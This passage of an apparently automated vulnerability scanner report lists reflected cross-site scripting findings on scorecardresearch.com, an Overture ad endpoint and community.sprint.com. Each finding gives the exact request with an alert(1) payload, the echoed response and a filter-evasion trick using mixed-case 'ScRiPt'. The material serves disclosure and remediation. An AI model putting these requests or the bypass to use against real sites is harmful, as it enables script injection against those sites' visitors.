Expires: Sun, 18 Sep 2011 01:11:09 GMT
Date: Sun, 04 Sep 2011 01:11:09 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888e62e9<script>alert(1)</script>9e2b676467b", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



5.34. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 91ca1<script>alert(1)</script>32419e9e9c1 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=291ca1<script>alert(1)</script>32419e9e9c1&c4=&c5=&c6=&c15=&tm=744917 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 01:11:10 GMT
Date: Sun, 04 Sep 2011 01:11:10 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
y{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"291ca1<script>alert(1)</script>32419e9e9c1", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



5.35. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 187f1<script>alert(1)</script>11f8c27111d was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=187f1<script>alert(1)</script>11f8c27111d&c5=&c6=&c15=&tm=744917 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 01:11:10 GMT
Date: Sun, 04 Sep 2011 01:11:10 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"187f1<script>alert(1)</script>11f8c27111d", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



5.36. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload de650<script>alert(1)</script>9da77839bed was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=de650<script>alert(1)</script>9da77839bed&c6=&c15=&tm=744917 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 01:11:11 GMT
Date: Sun, 04 Sep 2011 01:11:11 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"de650<script>alert(1)</script>9da77839bed", c6:"", c10:"", c15:"", c16:"", r:""});



5.37. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload bdb1a<script>alert(1)</script>b70cafdef9d was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=bdb1a<script>alert(1)</script>b70cafdef9d&c15=&tm=744917 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 01:11:11 GMT
Date: Sun, 04 Sep 2011 01:11:11 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"bdb1a<script>alert(1)</script>b70cafdef9d", c10:"", c15:"", c16:"", r:""});



5.38. http://cm.npc-mcclatchy.overture.com/js_1_0/ [css_url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cm.npc-mcclatchy.overture.com
Path:   /js_1_0/

Issue detail

The value of the css_url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84ec8"><script>alert(1)</script>c7d472a83b1 was submitted in the css_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js_1_0/?config=1001507650&type=news&ctxtId=news&keywordCharEnc=utf8&source=npc_mcclatchy_sacramentobee_t2_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fblogs.sacbee.com%2Fthe_state_worker%2F%23navlink%3Dnavdrop&ctxtCat=news&outputCharEnc=latin1&css_url=http://static.mcclatchyinteractive.com/static/styles/mi/third_party/yahoo/yahoo.css84ec8"><script>alert(1)</script>c7d472a83b1&tg=1&refUrl=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html&du=1&cb=1315097337736&ctxtContent=%3Chead%3E%3Cscript%20async%3D%22%22%20src%3D%22http%3A%2F%2Fwww.publish2.com%2Fnewsgroups%2Fstate-worker.js%3Fjsonp_callback%3DjQuery15205311797398608178_1315097321812%26amp%3B_%3D1315097336789%22%3E%3C%2Fscript%3E%3Cscript%20async%3D%22%22%20src%3D%22http%3A%2F%2Fapi.twitter.com%2F1%2Fstatuses%2Fuser_timeline.json%3Fscreen_name%3DTheStateWorker%26amp%3Bcallback%3DjQuery15205311797398608178_1315097321811%26amp%3B_%3D1315097336786%22%3E%3C%2Fscript%3E%0A%20%20%20%20%3Cscript%20type%3D%22text%2Fjavascript%22%20async%3D%22%22%20src%3D%22http%3A%2F%2Fwww.scribd.com%2Fjavascripts%2Fembed_code%2Finject.js%22%3E%3C%2Fscript%3E%3Cscript%20type%3D%22text%2Fjavascript%22%3E%0A%20%20 HTTP/1.1
Host: cm.npc-mcclatchy.overture.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=228g5ih765ieg&b=3&s=bh; UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDYyNXQxNTZ0MAZ7BMtQw=

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:03:22 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDYyM3Q0MzY0MAc4NMmAw=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Wed, 01-Sep-2021 01:03:22 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 857


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_blank">
<meta http-equiv="Content-Type" content="text/html; charse
...[SNIP]...
<link rel="stylesheet" href="http://static.mcclatchyinteractive.com/static/styles/mi/third_party/yahoo/yahoo.css84ec8"><script>alert(1)</script>c7d472a83b1" type="text/css">
...[SNIP]...

5.39. http://community.sprint.com/baw/community/buzzaboutwireless/customer-service/sprintdotcom-support [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.sprint.com
Path:   /baw/community/buzzaboutwireless/customer-service/sprintdotcom-support

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61c0e"><ScRiPt>alert(1)</ScRiPt>c060dbf3219 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /baw/community/buzzaboutwireless61c0e"><ScRiPt>alert(1)</ScRiPt>c060dbf3219/customer-service/sprintdotcom-support HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:27 GMT
Server: Apache-Coyote/1.1
X-JAL: 21
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=155803 t=1315099167532475
Connection: close
Content-Length: 40628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<form action="/baw/community/buzzaboutwireless61c0e"><ScRiPt>alert(1)</ScRiPt>c060dbf3219/customer-service/search.jspa" method="get" id="jive-userbar-search-form">
...[SNIP]...

5.40. http://community.sprint.com/baw/community/buzzaboutwireless/customer-service/sprintdotcom-support [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.sprint.com
Path:   /baw/community/buzzaboutwireless/customer-service/sprintdotcom-support

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72004"%3balert(1)//f27891277f2 was submitted in the REST URL parameter 3. This input was echoed as 72004";alert(1)//f27891277f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /baw/community/buzzaboutwireless72004"%3balert(1)//f27891277f2/customer-service/sprintdotcom-support HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:28 GMT
Server: Apache-Coyote/1.1
X-JAL: 10
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=125450 t=1315099168721365
Connection: close
Content-Length: 40583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
fileLoadingTooltip = "Loading user profile";
var profileErrorTooltip = "There was an error loading that profile information.";

var projectChooserUrl = "/baw/community/buzzaboutwireless72004";alert(1)//f27891277f2/customer-service/project-chooser!input.jspa";

var containerShortUrl = "/baw/container-short.jspa";
var containerLoadingTooltip = "Loading place information.";
var containerErr
...[SNIP]...

5.41. http://community.sprint.com/baw/community/buzzaboutwireless/customer-service/sprintdotcom-support [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.sprint.com
Path:   /baw/community/buzzaboutwireless/customer-service/sprintdotcom-support

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e620f"><ScRiPt>alert(1)</ScRiPt>df523a5d14b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /baw/community/buzzaboutwireless/customer-servicee620f"><ScRiPt>alert(1)</ScRiPt>df523a5d14b/sprintdotcom-support HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:34 GMT
Server: Apache-Coyote/1.1
X-JAL: 10
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=131245 t=1315099174578986
Connection: close
Content-Length: 40628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<form action="/baw/community/buzzaboutwireless/customer-servicee620f"><ScRiPt>alert(1)</ScRiPt>df523a5d14b/search.jspa" method="get" id="jive-userbar-search-form">
...[SNIP]...

5.42. http://community.sprint.com/baw/community/buzzaboutwireless/customer-service/sprintdotcom-support [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.sprint.com
Path:   /baw/community/buzzaboutwireless/customer-service/sprintdotcom-support

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0f1a"%3balert(1)//887e419074d was submitted in the REST URL parameter 4. This input was echoed as d0f1a";alert(1)//887e419074d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /baw/community/buzzaboutwireless/customer-serviced0f1a"%3balert(1)//887e419074d/sprintdotcom-support HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:35 GMT
Server: Apache-Coyote/1.1
X-JAL: 10
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=171254 t=1315099175790172
Connection: close
Content-Length: 40583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
p = "Loading user profile";
var profileErrorTooltip = "There was an error loading that profile information.";

var projectChooserUrl = "/baw/community/buzzaboutwireless/customer-serviced0f1a";alert(1)//887e419074d/project-chooser!input.jspa";

var containerShortUrl = "/baw/container-short.jspa";
var containerLoadingTooltip = "Loading place information.";
var containerErrorTooltip = "Ther
...[SNIP]...

5.43. http://community.sprint.com/baw/community/buzzaboutwireless/general/suggestions-for-sprint [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.sprint.com
Path:   /baw/community/buzzaboutwireless/general/suggestions-for-sprint

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49680"%3balert(1)//4dc0b3f35fc was submitted in the REST URL parameter 3. This input was echoed as 49680";alert(1)//4dc0b3f35fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /baw/community/buzzaboutwireless49680"%3balert(1)//4dc0b3f35fc/general/suggestions-for-sprint HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:36 GMT
Server: Apache-Coyote/1.1
X-JAL: 10
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=129929 t=1315099176570665
Connection: close
Content-Length: 40556

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
fileLoadingTooltip = "Loading user profile";
var profileErrorTooltip = "There was an error loading that profile information.";

var projectChooserUrl = "/baw/community/buzzaboutwireless49680";alert(1)//4dc0b3f35fc/general/project-chooser!input.jspa";

var containerShortUrl = "/baw/container-short.jspa";
var containerLoadingTooltip = "Loading place information.";
var containerErrorTooltip
...[SNIP]...

5.44. http://community.sprint.com/baw/community/buzzaboutwireless/general/suggestions-for-sprint [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.sprint.com
Path:   /baw/community/buzzaboutwireless/general/suggestions-for-sprint

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9daf5"><ScRiPt>alert(1)</ScRiPt>de7bb8d56fb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /baw/community/buzzaboutwireless9daf5"><ScRiPt>alert(1)</ScRiPt>de7bb8d56fb/general/suggestions-for-sprint HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:35 GMT
Server: Apache-Coyote/1.1
X-JAL: 9
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=130149 t=1315099175310012
Connection: close
Content-Length: 40601

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<form action="/baw/community/buzzaboutwireless9daf5"><ScRiPt>alert(1)</ScRiPt>de7bb8d56fb/general/search.jspa" method="get" id="jive-userbar-search-form">
...[SNIP]...

5.45. http://community.sprint.com/baw/community/buzzaboutwireless/general/suggestions-for-sprint [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.sprint.com
Path:   /baw/community/buzzaboutwireless/general/suggestions-for-sprint

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a8e3"><ScRiPt>alert(1)</ScRiPt>5cb950072cc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /baw/community/buzzaboutwireless/general5a8e3"><ScRiPt>alert(1)</ScRiPt>5cb950072cc/suggestions-for-sprint HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:44 GMT
Server: Apache-Coyote/1.1
X-JAL: 11
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=453971 t=1315099184012772
Connection: close
Content-Length: 40601

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<form action="/baw/community/buzzaboutwireless/general5a8e3"><ScRiPt>alert(1)</ScRiPt>5cb950072cc/search.jspa" method="get" id="jive-userbar-search-form">
...[SNIP]...

5.46. http://community.sprint.com/baw/community/buzzaboutwireless/general/suggestions-for-sprint [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.sprint.com
Path:   /baw/community/buzzaboutwireless/general/suggestions-for-sprint

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35f30"%3balert(1)//0d70885b912 was submitted in the REST URL parameter 4. This input was echoed as 35f30";alert(1)//0d70885b912 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /baw/community/buzzaboutwireless/general35f30"%3balert(1)//0d70885b912/suggestions-for-sprint HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:45 GMT
Server: Apache-Coyote/1.1
X-JAL: 9
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=217937 t=1315099185636976
Connection: close
Content-Length: 40556

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
ingTooltip = "Loading user profile";
var profileErrorTooltip = "There was an error loading that profile information.";

var projectChooserUrl = "/baw/community/buzzaboutwireless/general35f30";alert(1)//0d70885b912/project-chooser!input.jspa";

var containerShortUrl = "/baw/container-short.jspa";
var containerLoadingTooltip = "Loading place information.";
var containerErrorTooltip = "Ther
...[SNIP]...

5.47. http://community.sprint.com/baw/community/sprintblogs/buzz-by-sprint/sprint-video [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.sprint.com
Path:   /baw/community/sprintblogs/buzz-by-sprint/sprint-video

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a288"><ScRiPt>alert(1)</ScRiPt>e5184b709cf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /baw/community/sprintblogs5a288"><ScRiPt>alert(1)</ScRiPt>e5184b709cf/buzz-by-sprint/sprint-video HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:25 GMT
Server: Apache-Coyote/1.1
X-JAL: 10
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=121050 t=1315099165474445
Connection: close
Content-Length: 40604

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<form action="/baw/community/sprintblogs5a288"><ScRiPt>alert(1)</ScRiPt>e5184b709cf/buzz-by-sprint/search.jspa" method="get" id="jive-userbar-search-form">
...[SNIP]...

5.48. http://community.sprint.com/baw/community/sprintblogs/buzz-by-sprint/sprint-video [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.sprint.com
Path:   /baw/community/sprintblogs/buzz-by-sprint/sprint-video

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ba4c"%3balert(1)//4747f9a3021 was submitted in the REST URL parameter 3. This input was echoed as 4ba4c";alert(1)//4747f9a3021 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /baw/community/sprintblogs4ba4c"%3balert(1)//4747f9a3021/buzz-by-sprint/sprint-video HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
